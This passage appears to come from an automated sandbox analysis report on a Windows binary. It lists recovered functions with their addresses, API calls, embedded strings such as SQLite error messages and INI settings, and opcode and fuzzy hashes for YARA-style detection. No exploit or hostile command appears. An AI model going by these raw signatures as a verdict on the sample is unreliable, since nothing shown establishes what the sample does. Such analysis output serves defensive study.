                                                                                                                                                                                    • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                                                                                                    Function 00409F42 Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                                                                                                    • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                                                                                                    • GetParent.USER32(?), ref: 00409FA5
                                                                                                                                                                                    • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2163313125-0
                                                                                                                                                                                    • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                                    • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                                                                                                    • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                                                                                                    Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free$wcslen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3592753638-3916222277
                                                                                                                                                                                    • Opcode ID: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                                                                                                                                    • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                                                                                                    • Opcode Fuzzy Hash: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                                                                                                    Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                                                    • String ID: %s (%s)$YV@
                                                                                                                                                                                    • API String ID: 3979103747-598926743
                                                                                                                                                                                    • Opcode ID: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                                                                                                                    • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                                                                                    Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                                                                                                                    • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                    • API String ID: 2780580303-317687271
                                                                                                                                                                                    • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                    • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                    • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                                                                                    Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
                                                                                                                                                                                    • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                                                    • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                    • API String ID: 2767993716-572158859
                                                                                                                                                                                    • Opcode ID: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                                                                                                                                    • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                                                                                                                                    • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                                                                                                    Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                                                                                                    • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                                                                                      • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                                                    • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                    • API String ID: 3176057301-2039793938
                                                                                                                                                                                    • Opcode ID: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                                                                                                                                    • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                                                                                                                                    • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                                                                                                    Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • database %s is already in use, xrefs: 0042F6C5
                                                                                                                                                                                    • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                                                                                    • database is already attached, xrefs: 0042F721
                                                                                                                                                                                    • out of memory, xrefs: 0042F865
                                                                                                                                                                                    • unable to open database: %s, xrefs: 0042F84E
                                                                                                                                                                                    • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                                                                                    • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                    • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                    • API String ID: 1297977491-2001300268
                                                                                                                                                                                    • Opcode ID: 555983bd08e1e0f26dd17bbb53403158099364c4b4daee471fd2bbf0d1f998cc
                                                                                                                                                                                    • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 555983bd08e1e0f26dd17bbb53403158099364c4b4daee471fd2bbf0d1f998cc
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                                                                                                    Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB3F
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB5B
                                                                                                                                                                                    • memcpy.MSVCRT(?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB80
                                                                                                                                                                                    • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB94
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC17
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,004126A8,00000000), ref: 0040EC21
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC59
                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                                                    • String ID: ($d
                                                                                                                                                                                    • API String ID: 1140211610-1915259565
                                                                                                                                                                                    • Opcode ID: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                                                                                                                                    • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                                                                                                    • Opcode Fuzzy Hash: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                                                                                                                                    • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                                                                                                    Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                                                                                    • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3015003838-0
                                                                                                                                                                                    • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                                    • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                                    • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                                                                                                    Function 00407E1E Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00407E44
                                                                                                                                                                                    • memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 59245283-0
                                                                                                                                                                                    • Opcode ID: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                                                                                                                    • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                                                                                                    Function 0041851E Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041855C
                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                                                                                                    • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041858E
                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                                                                                                    • free.MSVCRT ref: 004185AC
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2802642348-0
                                                                                                                                                                                    • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                                                    • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                                                                                    • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                                                    • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                                                                                    Function 00414E7F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                                                                                                                    • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                                                                                                                    • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                    • API String ID: 3510742995-3273207271
                                                                                                                                                                                    • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                    • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                                                                                                    • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                    • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                                                                                                    Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
                                                                                                                                                                                    • memset.MSVCRT ref: 00413ADC
                                                                                                                                                                                    • memset.MSVCRT ref: 00413AEC
                                                                                                                                                                                      • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                    • memset.MSVCRT ref: 00413BD7
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00413BF8
                                                                                                                                                                                    • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,00000000), ref: 00413C4E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                                                    • String ID: 3A
                                                                                                                                                                                    • API String ID: 3300951397-293699754
                                                                                                                                                                                    • Opcode ID: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                                                                                                                    • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                                                                                                    Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                      • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                                                                      • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                                                    • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
